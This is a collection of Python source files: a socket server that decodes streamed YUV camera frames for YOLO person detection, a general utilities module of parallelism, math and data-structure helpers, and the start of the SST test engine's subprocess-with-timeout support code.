serversocket.listen()
def udp_thread():
udp_sock = s.socket(s.AF_INET, s.SOCK_DGRAM)
udp_sock.bind((s.gethostname(),4445))
print('Waiting for udp message!')
while True:
msg, addr = udp_sock.recvfrom(256)
print('Recieved udp message from {}'.format(addr))
udp_sock.sendto(msg, addr)
thread = threading.Thread(target = udp_thread, args=())
thread.daemon = True
thread.start()
print('Waiting for connection...')
socket, addr = serversocket.accept()
print('Connected!')
def recieve(socket, msg_len):
chunks = []
bytes_recd = 0
while bytes_recd < msg_len:
chunk = socket.recv(min(msg_len - bytes_recd, 2048))
if chunk == b'':
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b''.join(chunks)
def recieve_int(socket):
return struct.unpack('!i', recieve(socket, 4))[0]
def send_int(socket, num):
socket.sendall(struct.pack('!i',num))
def bytes_to_img(arr, width, height):
img = np.zeros((height, width, 3), dtype=np.float32)
for i in range(0,len(arr),4):
y1,u,y2,v = [int(a) for a in arr[i:i+4]]
x = (i % (width * 2)) // 2
y = i // (width * 2)
img[y,x] = yuv_to_rgb(y1,u,v)
img[y,x+1] = yuv_to_rgb(y2,u,v)
return img;
def clamp(num, low, high):
return min(max(num,low),high)
def yuv_to_rgb(y,u,v):
c = y-16
d = u-128
e = v-128
r = (298*c+409*e+128)/256
g = (298*c-100*d-208*e+128)/256
b = (298*c+516*d+128)/256
r = clamp(r,0,255)
g = clamp(g,0,255)
b = clamp(b,0,255)
return r, g, b
images = []
while True:
img_width = recieve_int(socket)
img_height = recieve_int(socket)
# Recieve image bytes and convert to np array
msg_len = recieve_int(socket)
raw_data = recieve(socket, msg_len)
img_data = bytes_to_img(raw_data, img_width, img_height)
images.append(img_data/255)
bounds = yolo.get_pred(img_data, 'person')
print('Pred: {}'.format(bounds)) |
utilities.py | import inspect
import signal
import random
import time
import traceback
import sys
import os
import subprocess
import math
import pickle as pickle
from itertools import chain
import heapq
import hashlib
def computeMD5hash(my_string):
# {{{
# https://stackoverflow.com/questions/13259691/convert-string-to-md5
m = hashlib.md5()
m.update(my_string.encode("utf-8"))
return m.hexdigest()
# }}}
class Thunk(object):
# {{{
# A class for lazy evaluation
def __init__(self, thing):
# {{{
self.thing = thing
self.evaluated = False
# }}}
def force(self):
# {{{
if self.evaluated:
return self.thing
else:
self.thing = self.thing()
self.evaluated = True
return self.thing
# }}}
# }}}
def cindex(i):
# {{{
return lambda a: a[i]
# }}}
class ConstantFunction:
# {{{
def __init__(self, v):
# {{{
self.v = v
# }}}
def __call__(self, *a, **k):
# {{{
return self.v
# }}}
# }}}
def eprint(*args, **kwargs):
# {{{
print(*args, file=sys.stderr, **kwargs)
flushEverything()
# }}}
class Bunch(object):
# {{{
def __init__(self, d):
# {{{
self.__dict__.update(d)
# }}}
def __setitem__(self, key, item):
# {{{
self.__dict__[key] = item
# }}}
def __getitem__(self, key):
# {{{
return self.__dict__[key]
# }}}
# }}}
def curry(fn):
"""Curries a function. Hacky way to return a curried version of functions with arbitrary #s of args."""
# {{{
def make_curry_fn(signature):
"""Redefines a currying function with the appropriate arguments. Hacky."""
# {{{
tmp_curry = "def tmp_curry(f): return "
tmp_curry += " ".join(
["lambda %s: " % argname for argname in signature.parameters]
)
tmp_curry += "f"
tmp_curry += str(signature)
return tmp_curry
# }}}
exec(make_curry_fn(inspect.signature(fn)), globals())
return tmp_curry(fn)
# }}}
class Curried:
# {{{
def __init__(self, f, arguments=None, arity=None):
# {{{
if arity is None:
arity = len(inspect.getargspec(f)[0])
self.f = f
self.arity = arity
if arguments is None:
arguments = []
self.arguments = arguments
# }}}
def __call__(self, x):
# {{{
arguments = self.arguments + [x]
if len(arguments) == self.arity:
return self.f(*arguments)
else:
return Curried(self.f, arguments=arguments, arity=self.arity)
# }}}
def __str__(self):
# {{{
if len(self.arguments) == 0:
return f"Curried({self.f}/{self.arity})"
else:
return (
f"Curried({self.f}/{self.arity}, {', '.join(map(str,self.arguments))})"
)
# }}}
def __repr__(self):
# {{{
return str(self)
# }}}
# }}}
def hashable(v):
"""Determine whether `v` can be hashed."""
# {{{
try:
hash(v)
except TypeError:
return False
return True
# }}}
def flatten(x, abort=lambda x: False):
"""Recursively unroll iterables."""
# {{{
if abort(x):
yield x
return
try:
yield from chain(*(flatten(i, abort) for i in x))
except TypeError: # not iterable
yield x
# {{{
def growImage(i, iterations=2):
# }}}
import numpy as np
for _ in range(iterations):
ip = np.zeros(i.shape)
# assume it is monochromatic and get the color
c = np.array([i[:, :, j].max() for j in range(4)])
# assume that the alpha channel indicates where the foreground is
foreground = i[:, :, 3] > 0
foreground = (
foreground
+ np.pad(foreground, ((0, 1), (0, 0)), mode="constant")[1:, :]
+ np.pad(foreground, ((0, 0), (0, 1)), mode="constant")[:, 1:]
+ np.pad(foreground, ((0, 0), (1, 0)), mode="constant")[:, :-1]
+ np.pad(foreground, ((1, 0), (0, 0)), mode="constant")[:-1, :]
)
ip[foreground] = c
i = ip
return ip
# }}}
def summaryStatistics(n, times):
# {{{
if len(times) == 0:
eprint(n, "no successful times to report statistics on!")
else:
eprint(
n,
"average: ",
int(mean(times) + 0.5),
"sec.\tmedian:",
int(median(times) + 0.5),
"\tmax:",
int(max(times) + 0.5),
"\tstandard deviation",
int(standardDeviation(times) + 0.5),
)
# }}}
# the reason for this, is because it is a user option to clear these metrics each loop
def updateTaskSummaryMetrics(taskSummaryMetrics, newMetricsDict, key):
"""Updates a taskSummaryMetrics dict from tasks -> metrics with new metrics under the given key."""
# {{{
for task in newMetricsDict:
if task in taskSummaryMetrics:
taskSummaryMetrics[task][key] = newMetricsDict[task]
else:
taskSummaryMetrics[task] = {key: newMetricsDict[task]}
# }}}
NEGATIVEINFINITY = float("-inf")
POSITIVEINFINITY = float("inf")
PARALLELMAPDATA = None
PARALLELBASESEED = None
def parallelMap(
# {{{
numberOfCPUs,
f,
*xs,
chunksize=None,
maxtasksperchild=None,
memorySensitive=False,
seedRandom=False,
):
# }}}
"""seedRandom: Should each parallel worker be given a different random seed?"""
# {{{
global PARALLELMAPDATA
global PARALLELBASESEED
if memorySensitive:
memoryUsage = getMemoryUsageFraction() / 100.0
correctedCPUs = max(1, min(int(0.9 / memoryUsage), numberOfCPUs))
assert correctedCPUs <= numberOfCPUs
assert correctedCPUs >= 1
if correctedCPUs < numberOfCPUs:
eprint(
"In order to not use all of the memory on the machine (%f gb), we are limiting this parallel map to only use %d CPUs"
% (howManyGigabytesOfMemory(), correctedCPUs)
)
numberOfCPUs = correctedCPUs
if numberOfCPUs == 1:
return list(map(f, *xs))
n = len(xs[0])
for x in xs:
assert len(x) == n
assert PARALLELMAPDATA is None
PARALLELMAPDATA = (f, xs)
assert PARALLELBASESEED is None
if seedRandom:
PARALLELBASESEED = random.random()
from multiprocessing import Pool
# Randomize the order in case easier ones come earlier or later
permutation = list(range(n))
random.shuffle(permutation)
inversePermutation = dict(zip(permutation, range(n)))
# Batch size of jobs as they are sent to processes
if chunksize is None:
chunksize = max(1, n // (numberOfCPUs * 2))
pool = Pool(numberOfCPUs, maxtasksperchild=maxtasksperchild)
ys = pool.map(parallelMapCallBack, permutation, chunksize=chunksize)
pool.terminate()
PARALLELMAPDATA = None
PARALLELBASESEED = None
return [ys[inversePermutation[j]] for j in range(n)]
# }}}
def parallelMapCallBack(j):
# {{{
global PARALLELMAPDATA
global PARALLELBASESEED
if PARALLELBASESEED is not None:
random.seed(PARALLELBASESEED + j)
f, xs = PARALLELMAPDATA
try:
return f(*[x[j] for x in xs])
except Exception as e:
eprint(
"Exception in worker during lightweight parallel map:\n%s"
% (traceback.format_exc())
)
raise e
# }}}
def log(x):
# {{{
t = type(x)
if t == int or t == float:
if x == 0:
return NEGATIVEINFINITY
return math.log(x)
return x.log()
# }}}
def exp(x):
# {{{
t = type(x)
if t == int or t == float:
return math.exp(x)
return x.exp()
# }}}
def lse(x, y=None):
# {{{
if y is None:
largest = None
if len(x) == 0:
raise Exception("LSE: Empty sequence")
if len(x) == 1:
return x[0]
# If these are just numbers...
t = type(x[0])
if t == int or t == float:
largest = max(*x)
return largest + math.log(sum(math.exp(z - largest) for z in x))
# added clause to avoid zero -dim tensor problem
import torch
if t == torch.Tensor and x[0].size() == torch.Size([]):
return torchSoftMax([datum.view(1) for datum in x])
# Must be torch
return torchSoftMax(x)
else:
if x is NEGATIVEINFINITY:
return y
if y is NEGATIVEINFINITY:
return x
tx = type(x)
ty = type(y)
if (ty == int or ty == float) and (tx == int or tx == float):
if x > y:
return x + math.log(1.0 + math.exp(y - x))
else:
return y + math.log(1.0 + math.exp(x - y))
return torchSoftMax(x, y)
# }}}
def torchSoftMax(x, y=None):
# {{{
from torch.nn.functional import log_softmax
import torch
if y is None:
if isinstance(x, list):
x = torch.cat(x)
return (x - log_softmax(x, dim=0))[0]
x = torch.cat((x, y))
# this is so stupid
return (x - log_softmax(x, dim=0))[0]
# }}}
def invalid(x):
# {{{
return math.isinf(x) or math.isnan(x)
# }}}
def valid(x):
# {{{
return not invalid(x)
# }}}
def forkCallBack(x):
# {{{
[f, a, k] = x
try:
return f(*a, **k)
except Exception as e:
eprint("Exception in worker during forking:\n%s" % (traceback.format_exc()))
raise e
# }}}
def callFork(f, *arguments, **kw):
# {{{
"""Forks a new process to execute the call. Blocks until the call completes."""
global FORKPARAMETERS
from multiprocessing import Pool
workers = Pool(1)
ys = workers.map(forkCallBack, [[f, arguments, kw]])
workers.terminate()
assert len(ys) == 1
return ys[0]
# }}}
PARALLELPROCESSDATA = None
def launchParallelProcess(f, *a, **k):
# {{{
global PARALLELPROCESSDATA
PARALLELPROCESSDATA = [f, a, k]
from multiprocessing import Process
p = Process(target=_launchParallelProcess, args=tuple([]))
p.start()
PARALLELPROCESSDATA = None
return p
# }}}
def _launchParallelProcess():
# {{{
global PARALLELPROCESSDATA
[f, a, k] = PARALLELPROCESSDATA
try:
f(*a, **k)
except Exception as e:
eprint("Exception in worker during forking:\n%s" % (traceback.format_exc()))
raise e
# }}}
def jsonBinaryInvoke(binary, message):
# {{{
import json
import subprocess
import os
message = json.dumps(message)
try:
process = subprocess.Popen(
binary, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
response, error = process.communicate(bytes(message, encoding="utf-8"))
except OSError as exc:
raise exc
try:
response = json.loads(response.decode("utf-8"))
except Exception as e:
eprint("Could not parse json.")
with open("/tmp/_message", "w") as handle:
handle.write(message)
with open("/tmp/_response", "w") as handle:
handle.write(response.decode("utf-8"))
raise e
return response
# }}}
class CompiledTimeout(Exception):
# {{{
pass
# }}}
def get_root_dir():
"""
Returns the absolute path to the root directory of the repository as a string.
This method is primarily used in order to locate the binaries at the root of the
repository.
"""
# {{{
return os.path.join(os.path.dirname(__file__), os.pardir)
# }}}
def get_data_dir():
"""
Returns the absolute path to the data directory of the repository as a string.
"""
# {{{
return os.path.join(get_root_dir(), "data")
# }}}
def callCompiled(f, *arguments, **keywordArguments):
# {{{
import dill
pypyArgs = []
profile = keywordArguments.pop("profile", None)
if profile:
pypyArgs = ["-m", "vmprof", "-o", profile]
PIDCallBack = keywordArguments.pop("PIDCallBack", None)
timeout = keywordArguments.pop("compiledTimeout", None)
# Use absolute paths.
compiled_driver_file = os.path.join(get_root_dir(), "bin", "compiledDriver.py")
p = subprocess.Popen(
["pypy3"] + pypyArgs + [compiled_driver_file],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
if PIDCallBack is not None:
PIDCallBack(p.pid)
request = {
"function": f,
"arguments": arguments,
"keywordArguments": keywordArguments,
}
start = time.time()
dill.dump(request, p.stdin)
# p.stdin.write(request)
p.stdin.flush()
# p.stdin.close()
dt = time.time() - start
if dt > 1:
eprint(
"(Python side of compiled driver: SLOW) Wrote serialized message for {} in time {}".format(
f.__name__, dt
)
)
if timeout is None:
success, result = dill.load(p.stdout)
else:
eprint("Running with timeout", timeout)
def timeoutCallBack(_1, _2):
raise CompiledTimeout()
signal.signal(signal.SIGALRM, timeoutCallBack)
signal.alarm(int(math.ceil(timeout)))
try:
success, result = dill.load(p.stdout)
signal.alarm(0)
except CompiledTimeout:
# Kill the process
p.kill()
raise CompiledTimeout()
if not success:
sys.exit(1)
return result
# }}}
class timing(object):
# {{{
def __init__(self, message):
# {{{
self.message = message
# }}}
def __enter__(self):
# {{{
self.start = time.time()
return self
# }}}
def __exit__(self, type, value, traceback):
# {{{
dt = time.time() - self.start
if isinstance(self.message, str):
message = self.message
elif callable(self.message):
message = self.message(dt)
else:
assert False, "Timing message should be string function"
eprint("%s in %.1f seconds" % (message, dt))
# }}}
# }}}
class random_seed(object):
# {{{
def __init__(self, seed):
# {{{
self.seed = seed
# }}}
def __enter__(self):
# {{{
self._oldSeed = random.getstate()
random.seed(self.seed)
return self
# }}}
def __exit__(self, type, value, traceback):
# {{{
random.setstate(self._oldSeed)
# }}}
# }}}
def randomPermutation(l):
# {{{
import random
l = list(l)
random.shuffle(l)
return l
# }}}
def batches(data, size=1):
# {{{
import random
# Randomly permute the data
data = list(data)
random.shuffle(data)
start = 0
while start < len(data):
yield data[start : size + start]
start += size
# }}}
def sampleDistribution(d):
"""
Expects d to be a list of tuples
The first element should be the probability
If the tuples are of length 2 then it returns the second element
Otherwise it returns the suffix tuple
"""
# {{{
import random
z = float(sum(t[0] for t in d))
if z == 0.0:
eprint("sampleDistribution: z = 0")
eprint(d)
r = random.random()
u = 0.0
for index, t in enumerate(d):
p = t[0] / z
# This extra condition is needed for floating-point bullshit
if r <= u + p or index == len(d) - 1:
if len(t) <= 2:
return t[1]
else:
return t[1:]
u += p
assert False
# }}}
def sampleLogDistribution(d):
"""
Expects d to be a list of tuples
The first element should be the log probability
If the tuples are of length 2 then it returns the second element
Otherwise it returns the suffix tuple
"""
# {{{
import random
z = lse([t[0] for t in d])
r = random.random()
u = 0.0
for t in d:
p = math.exp(t[0] - z)
if r < u + p:
if len(t) <= 2:
return t[1]
else:
return t[1:]
u += p
assert False
# }}}
def testTrainSplit(x, trainingFraction, seed=0):
# {{{
if trainingFraction > 1.1:
# Assume that the training fraction is actually the number of tasks
# that we want to train on
trainingFraction = float(trainingFraction) / len(x)
needToTrain = {
j for j, d in enumerate(x) if hasattr(d, "mustTrain") and d.mustTrain
}
mightTrain = [j for j in range(len(x)) if j not in needToTrain]
trainingSize = max(0, int(len(x) * trainingFraction - len(needToTrain)))
import random
random.seed(seed)
random.shuffle(mightTrain)
training = set(mightTrain[:trainingSize]) | needToTrain
train = [t for j, t in enumerate(x) if j in training]
test = [t for j, t in enumerate(x) if j not in training]
return test, train
# }}}
def numberOfCPUs():
# {{{
import multiprocessing
return multiprocessing.cpu_count()
# }}}
def loadPickle(f):
# {{{
with open(f, "rb") as handle:
d = pickle.load(handle)
return d
# }}}
def dumpPickle(o, f):
# {{{
with open(f, "wb") as handle:
pickle.dump(o, handle)
# }}}
def fst(l):
# {{{
for v in l:
return v
# }}}
def mean(l):
# {{{
n = 0
t = None
for x in l:
if t is None:
t = x
else:
t = t + x
n += 1
if n == 0:
eprint("warning: asked to calculate the mean of an empty list. returning zero.")
return 0
return t / float(n)
# }}}
def variance(l):
# {{{
m = mean(l)
return sum((x - m) ** 2 for x in l) / len(l)
# }}}
def standardDeviation(l):
# {{{
return variance(l) ** 0.5
# }}}
def median(l):
# {{{
if len(l) <= 0:
return None
l = sorted(l)
if len(l) % 2 == 1:
return l[len(l) // 2]
return 0.5 * (l[len(l) // 2] + l[len(l) // 2 - 1])
# }}}
def percentile(l, p):
# {{{
l = sorted(l)
j = int(len(l) * p)
if j < len(l):
return l[j]
return 0
# }}}
def makeTemporaryFile(directory="/tmp"):
# {{{
import tempfile
fd, p = tempfile.mkstemp(dir=directory)
os.close(fd)
return p
# }}}
class Stopwatch:
# {{{
def __init__(self):
# {{{
self._elapsed = 0.0
self.running = False
self._latestStart = None
# }}}
def start(self):
# {{{
if self.running:
eprint(
"(stopwatch: attempted to start an already running stopwatch. Silently ignoring.)"
)
return
self.running = True
self._latestStart = time.time()
# }}}
def stop(self):
# {{{
if not self.running:
eprint(
"(stopwatch: attempted to stop a stopwatch that is not running. Silently ignoring.)"
)
return
self.running = False
self._elapsed += time.time() - self._latestStart
self._latestStart = None
# }}}
@property
def elapsed(self):
# {{{
e = self._elapsed
if self.running:
e = e + time.time() - self._latestStart
return e
# }}}
# }}}
def userName():
# {{{
import getpass
return getpass.getuser()
# }}}
def hostname():
# {{{
import socket
return socket.gethostname()
# }}}
def getPID():
# {{{
return os.getpid()
# }}}
def CPULoad():
# {{{
try:
import psutil
except BaseException:
return "unknown - install psutil"
return psutil.cpu_percent()
# }}}
def flushEverything():
# {{{
sys.stdout.flush()
sys.stderr.flush()
# }}}
class RunWithTimeout(Exception):
# {{{
pass
# }}}
def runWithTimeout(k, timeout):
# {{{
if timeout is None:
return k()
def timeoutCallBack(_1, _2):
raise RunWithTimeout()
signal.signal(signal.SIGPROF, timeoutCallBack)
signal.setitimer(signal.ITIMER_PROF, timeout)
try:
result = k()
signal.signal(signal.SIGPROF, lambda *_: None)
signal.setitimer(signal.ITIMER_PROF, 0)
return result
except RunWithTimeout:
signal.signal(signal.SIGPROF, lambda *_: None)
signal.setitimer(signal.ITIMER_PROF, 0)
raise RunWithTimeout()
except:
signal.signal(signal.SIGPROF, lambda *_: None)
signal.setitimer(signal.ITIMER_PROF, 0)
raise
# }}}
def crossProduct(a, b):
# {{{
b = list(b)
for x in a:
for y in b:
yield x, y
# }}}
class PQ(object):
"""why the fuck does Python not wrap this in a class"""
# {{{
def __init__(self):
# {{{
self.h = []
self.index2value = {}
self.nextIndex = 0
# }}}
def push(self, priority, v):
# {{{
self.index2value[self.nextIndex] = v
heapq.heappush(self.h, (-priority, self.nextIndex))
self.nextIndex += 1
# }}}
def popMaximum(self):
# {{{
i = heapq.heappop(self.h)[1]
v = self.index2value[i]
del self.index2value[i]
return v
# }}}
def __iter__(self):
# {{{
for _, v in self.h:
yield self.index2value[v]
# }}}
def __len__(self):
# {{{
return len(self.h)
# }}}
# }}}
class UnionFind:
# {{{
class Class:
def __init__(self, x):
# {{{
self.members = {x}
self.leader = None
# }}}
def chase(self):
# {{{
k = self
while k.leader is not None:
k = k.leader
self.leader = k
return k
# }}}
def __init__(self):
# {{{
# Map from keys to classes
self.classes = {}
# }}}
def unify(self, x, y):
# {{{
k1 = self.classes[x].chase()
k2 = self.classes[y].chase()
# k2 will be the new leader
k1.leader = k2
k2.members |= k1.members
k1.members = None
self.classes[x] = k2
self.classes[y] = k2
return k2
# }}}
def newClass(self, x):
# {{{
if x not in self.classes:
n = Class(x)
self.classes[x] = n
# }}}
def otherMembers(self, x):
# {{{
k = self.classes[x].chase()
self.classes[x] = k
return k.members
# }}}
# }}}
def substringOccurrences(ss, s):
# {{{
return sum(s[i:].startswith(ss) for i in range(len(s)))
# }}}
def normal(s=1.0, m=0.0):
# {{{
u = random.random()
v = random.random()
n = math.sqrt(-2.0 * log(u)) * math.cos(2.0 * math.pi * v)
return s * n + m
# }}}
def powerOfTen(n):
# {{{
if n <= 0:
return False
while True:
if n == 1:
return True
if n % 10 != 0:
return False
n = n / 10
# }}}
def powerOf(p, n):
# {{{
if n <= 0:
return False
while True:
if n == 1:
return True
if n % p != 0:
return False
n = n / p
# }}}
def getThisMemoryUsage():
# {{{
import os
import psutil
process = psutil.Process(os.getpid())
return process.memory_info().rss
# }}}
def getMemoryUsageFraction():
# {{{
import psutil
return psutil.virtual_memory().percent
# }}}
def howManyGigabytesOfMemory():
# {{{
import psutil
return psutil.virtual_memory().total / 10**9
# }}}
def tuplify(x):
# {{{
if isinstance(x, (list, tuple)):
return tuple(tuplify(z) for z in x)
return x
# }}}
# image montage!
def makeNiceArray(l, columns=None):
# {{{
n = columns or int(len(l) ** 0.5)
a = []
while l:
a.append(l[:n])
l = l[n:]
return a
# }}}
def montageMatrix(matrix):
# {{{
import numpy as np
arrays = matrix
m = max(len(t) for t in arrays)
size = arrays[0][0].shape
tp = arrays[0][0].dtype
arrays = [
np.concatenate(ts + [np.zeros(size, dtype=tp)] * (m - len(ts)), axis=1)
for ts in arrays
]
arrays = np.concatenate(arrays, axis=0)
return arrays
# }}}
def montage(arrays, columns=None):
# {{{
return montageMatrix(makeNiceArray(arrays, columns=columns))
# }}}
def showArrayAsImage(a):
# {{{
from pylab import imshow, show
imshow(a)
show()
# }}}
class ParseFailure(Exception):
# {{{
pass
# }}}
def parseSExpression(s):
# {{{
s = s.strip()
def p(n):
while n <= len(s) and s[n].isspace():
n += 1
if n == len(s):
raise ParseFailure(s)
if s[n] == "#":
e, n = p(n + 1)
return ["#", e], n
if s[n] == "(":
l = []
n += 1
while True:
x, n = p(n)
l.append(x)
while n <= len(s) and s[n].isspace():
n += 1
if n == len(s):
raise ParseFailure(s)
if s[n] == ")":
n += 1
break
return l, n
name = []
while n < len(s) and not s[n].isspace() and s[n] not in "()":
name.append(s[n])
n += 1
name = "".join(name)
return name, n
e, n = p(0)
if n == len(s):
return e
raise ParseFailure(s)
# }}}
def diffuseImagesOutward(
# {{{
imageCoordinates,
labelCoordinates,
d,
maximumRadius=2.5,
minimumRadius=1.5,
):
import numpy as np
n = imageCoordinates.shape[0]
# d = (np.random.rand(n,2)*2 - 1)*(maximumRadius/2 + minimumRadius/2)
def _constrainRadii(p):
# {{{
r = (p * p).sum()
if r > maximumRadius:
return maximumRadius * p / (r**0.5)
if r < minimumRadius:
return minimumRadius * p / (r**0.5)
return p
# }}}
def constrainRadii():
# {{{
for j in range(n):
d[j, :] = _constrainRadii(d[j, :])
# }}}
for _ in range(10):
for i in range(n):
force = np.array([0.0, 0.0])
for j in range(n):
if i == j:
continue
p1 = imageCoordinates[i] + d[i]
p2 = imageCoordinates[j] + d[j]
l = ((p1 - p2) ** 2).sum() ** 0.5
if l > 1.5:
continue
force += (p1 - p2) / l / max(l, 0.2)
if force.sum() > 0:
force = force / ((force * force).sum() ** 0.5)
d[i] += force
constrainRadii()
return d
# }}}
if __name__ == "__main__":
def f(n):
if n == 0:
return None
return [f(n - 1), f(n - 1)]
z = f(22)
eprint(getMemoryUsageFraction().percent)
eprint(getThisMemoryUsage())
|
test_engine_support.py | # -*- coding: utf-8 -*-
## Copyright 2009-2021 NTESS. Under the terms
## of Contract DE-NA0003525 with NTESS, the U.S.
## Government retains certain rights in this software.
##
## Copyright (c) 2009-2021, NTESS
## All rights reserved.
##
## This file is part of the SST software package. For license
## information, see the LICENSE file in the top level directory of the
## distribution.
""" This module provides the low level calls to the OS shell and other support
functions
"""
import sys
import os
import subprocess
import threading
import traceback
import shlex
import ast
import inspect
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
import test_engine_globals
################################################################################
class OSCommand():
""" Enables to run subprocess commands in a different thread with a TIMEOUT option.
This will return a OSCommandResult object.
Based on a modified version of jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
###
def __init__(self, cmd_str, output_file_path=None, error_file_path=None,
set_cwd=None, use_shell=False):
"""
Args:
cmd_str (str): The command to be executed
output_file_path (str): The file path to send the std outpput from the cmd
if None send to stdout.
error_file_path (str): The file path to send the std error from the cmd
if None send to stderr
set_cwd (str): Path to change dir to before running cmd; if None then
use current working directory.
use_shell (bool): Execute the cmd using the shell (not recommended)
"""
self._output_file_path = None
self._error_file_path = None
self._cmd_str = None
self._process = None
self._timeout_sec = 60
self._run_status = None
self._run_output = ''
self._run_error = ''
self._run_timeout = False
self._use_shell = use_shell
self._set_cwd = set_cwd
self._validate_cmd_str(cmd_str)
self._output_file_path = self._validate_output_path(output_file_path)
self._error_file_path = self._validate_output_path(error_file_path)
####
def run(self, timeout_sec=60, **kwargs):
""" Run a command then return and OSCmdRtn object.
Args:
timeout_sec (int): The maximum runtime in seconds before thread
will be terminated and a timeout error will occur.
kwargs: Extra parameters
"""
if not (isinstance(timeout_sec, (int, float)) and not isinstance(timeout_sec, bool)):
raise ValueError("ERROR: Timeout must be an int or a float")
self._timeout_sec = timeout_sec
# Build the thread that will monitor the subprocess with a timeout
thread = threading.Thread(target=self._run_cmd_in_subprocess, kwargs=kwargs)
thread.start()
thread.join(self._timeout_sec)
if thread.is_alive():
self._run_timeout = True
self._process.kill()
thread.join()
# Build a OSCommandResult object to hold the results
rtn = OSCommandResult(self._cmd_str, self._run_status, self._run_output,
self._run_error, self._run_timeout)
return rtn
####
def _run_cmd_in_subprocess(self, **kwargs):
""" Run the command in a subprocess """
file_out = None
file_err = None
try:
# Run in either the users choosen directory or the run dir
if self._set_cwd is None:
subprocess_path = test_engine_globals.TESTOUTPUT_RUNDIRPATH
else:
subprocess_path = os.path.abspath(self._set_cwd)
# If No output files defined, default stdout and stderr to normal output
if 'stdout' not in kwargs and self._output_file_path is None:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs and self._error_file_path is None:
kwargs['stderr'] = subprocess.PIPE
# Create the stderr & stdout to the output files, if stderr path is
# not defined, then use the normal output file
if 'stdout' not in kwargs and self._output_file_path is not None:
file_out = open(self._output_file_path, 'w+')
kwargs['stdout'] = file_out
if self._error_file_path is None:
kwargs['stderr'] = file_out
if 'stderr' not in kwargs and self._error_file_path is not None:
file_err = open(self._error_file_path, 'w+')
kwargs['stderr'] = file_err
self._process = subprocess.Popen(self._cmd_str,
shell=self._use_shell,
cwd = subprocess_path,
**kwargs)
self._run_output, self._run_error = self._process.communicate()
self._run_status = self._process.returncode
if self._run_output is None:
self._run_output = ""
if self._run_error is None:
self._run_error = ""
except:
self._run_error = traceback.format_exc()
self._run_status = -1
# Close any open files
if file_out is not None:
file_out.close()
if file_err is not None:
file_err.close()
####
def _validate_cmd_str(self, cmd_str):
""" Validate the cmd_str """
if isinstance(cmd_str, str):
if cmd_str != "":
cmd_str = shlex.split(cmd_str)
else:
raise ValueError("ERROR: OSCommand() cmd_str must not be empty")
else:
raise ValueError("ERROR: OSCommand() cmd_str must be a string")
self._cmd_str = cmd_str
####
def _validate_output_path(self, file_path):
""" Validate the output file path """
if file_path is not None:
dirpath = os.path.abspath(os.path.dirname(file_path))
if not os.path.exists(dirpath):
err_str = (("ERROR: OSCommand() Output path to file {0} ") +
("is not valid")).format(file_path)
raise ValueError(err_str)
return file_path
################################################################################
class OSCommandResult():
""" This class returns result data about the OSCommand that was executed """
def __init__(self, cmd_str, status, output, error, timeout):
"""
Args:
cmd_str (str): The command to be executed
status (int): The return status of the command execution.
output (str): The standard output of the command execution.
error (str): The error output of the command execution.
timeout (bool): True if the command timed out during execution.
"""
self._run_cmd_str = cmd_str
self._run_status = status
self._run_output = output
self._run_error = error
self._run_timeout = timeout
####
def __repr__(self):
rtn_str = (("Cmd = {0}; Status = {1}; Timeout = {2}; ") +
("Error = {3}; Output = {4}")).format(self._run_cmd_str, \
self._run_status, self._run_timeout, self._run_error, \
self._run_output)
return rtn_str
####
def __str__(self):
return self.__repr__()
####
def cmd(self):
""" return the command that was run """
return self._run_cmd_str
####
def result(self):
""" return the run status result """
return self._run_status
####
def output(self):
""" return the run output result """
# Sometimes the output can be a unicode or a byte string - convert it
if PY3:
if type(self._run_output) is bytes:
self._run_output = self._run_output.decode(encoding='UTF-8')
return self._run_output
else:
return self._run_output.decode('utf-8')
####
def error(self):
""" return the run error output result """
# Sometimes the output can be a unicode or a byte string - convert it
if PY3:
if type(self._run_error) is bytes:
self._run_error = self._run_error.decode(encoding='UTF-8')
return self._run_error
else:
return self._run_error.decode('utf-8')
####
def timeout(self):
""" return true if the run timed out """
return self._run_timeout
################################################################################
def check_param_type(varname, vardata, datatype):
""" Validate a parameter to ensure it is of the correct type.
Args:
varname (str) = The string name of the variable
vardata (???) = The actual variable of any type
datatype (???) = The type that we want to confirm
Raises:
ValueErr: variable is not of the correct type.
"""
caller = inspect.stack()[1][3]
if not isinstance(vardata, datatype):
err_str = (("TEST-ERROR: {0}() param {1} = {2} is a not a {3}; it is a ") +
("{4}")).format(caller, varname, vardata, datatype, type(vardata))
print(err_str)
raise ValueError(err_str)
################################################################################
def strclass(cls):
""" Return the classname of a class"""
return "%s" % (cls.__module__)
def strqual(cls):
""" Return the qualname of a class"""
return "%s" % (_qualname(cls))
################################################################################
# qualname from https://github.com/wbolster/qualname to support Py2 and Py3
# LICENSE -> https://github.com/wbolster/qualname/blob/master/LICENSE.rst
#__all__ = ['qualname']
_cache = {}
def _qualname(obj):
"""Find out the qualified name for a class or function."""
# For Python 3.3+, this is straight-forward.
if hasattr(obj, '__qualname__'):
return obj.__qualname__
# For older Python versions, things get complicated.
# Obtain the filename and the line number where the
# class/method/function is defined.
try:
filename = inspect.getsourcefile(obj)
except TypeError:
return obj.__qualname__ # raises a sensible error
if not filename:
return obj.__qualname__ # raises a sensible error
if inspect.isclass(obj):
try:
_, lineno = inspect.getsourcelines(obj)
except (OSError, IOError):
return obj.__qualname__ # raises a sensible error
elif inspect.isfunction(obj) or inspect.ismethod(obj):
if hasattr(obj, 'im_func'):
# Extract function from unbound method (Python 2)
obj = obj.im_func
try:
code = obj.__code__
except AttributeError:
code = obj.func_code
lineno = code.co_firstlineno
else:
return obj.__qualname__ # raises a sensible error
# Re-parse the source file to figure out what the
# __qualname__ should be by analysing the abstract
# syntax tree. Use a cache to avoid doing this more
# than once for the same file.
qualnames = _cache.get(filename)
if qualnames is None:
with open(filename, 'r') as filehandle:
source = filehandle.read()
node = ast.parse(source, filename)
visitor = _Visitor()
visitor.visit(node)
_cache[filename] = qualnames = visitor.qualnames
try:
return qualnames[lineno]
except KeyError:
return obj.__qualname__ # raises a sensible error
class _Visitor(ast.NodeVisitor):
"""Support class for qualname function"""
def __init__(self):
super(_Visitor, self).__init__()
self.stack = []
self.qualnames = {}
def store_qualname(self, lineno):
"""Support method for _Visitor class"""
